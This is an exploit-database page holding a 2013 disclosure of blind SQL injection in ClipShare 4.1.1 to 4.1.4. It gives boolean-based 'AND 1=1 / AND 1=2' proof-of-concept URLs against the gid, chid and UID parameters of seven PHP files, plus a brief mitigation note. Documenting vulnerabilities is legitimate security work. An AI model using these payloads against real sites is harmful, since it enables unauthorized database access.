header-logo
Suggest Exploit
vendor:
ClipShare - Video Sharing Community Script
by:
Esac
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ClipShare - Video Sharing Community Script
Affected Version From: 4.1.1
Affected Version To: 4.1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:clip-share:clipshare:4.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

ClipShare 4.1.1 – Multiples Vulnerabilites

ClipShare 4.1.1 is vulnerable to multiple SQL Injection vulnerabilities. The vulnerabilities exist in the gvideos.php, channel_detail.php, uprofile.php and ufavour.php files, where the gid, chid, UID parameters are not properly sanitized before being used in an SQL query. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable parameters. To exploit this vulnerability, the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013

# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

vuln file : gvideos.php , param : gid 

Poc :

http://server/mavideo/gvideos.php?gid=1 [Blind]

#to exlploit this poc , must group to be added previously with some videos publics

Real exploitation :

http://server/mavideo/gvideos.php?gid=1 AND 1=1

==> return normal page

http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------


vuln file : channel_detail.php , param : chid

Poc :

http://server/mavideo/channel_detail.php?chid=4 [Blind]


Real exploitation :

http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page

http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : uprofile.php , param : UID

Poc :

http://server/mavideo/uprofile.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : ufavour.php , param : UID

Poc :

http://server/mavideo/ufavour.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufriends.php , param : UID

Poc :

http://server/mavideo/ufriends.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uplaylist.php , param : UID

Poc :

http://server/mavideo/uplaylist.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ugroups.php , param : UID

Poc :

http://server/mavideo/ugroups.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

PwnEd.
Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team & Cobra & Dami 

==> Made In Moroco <==
./Esac

Navigation

Suggest Exploit

Services By CQR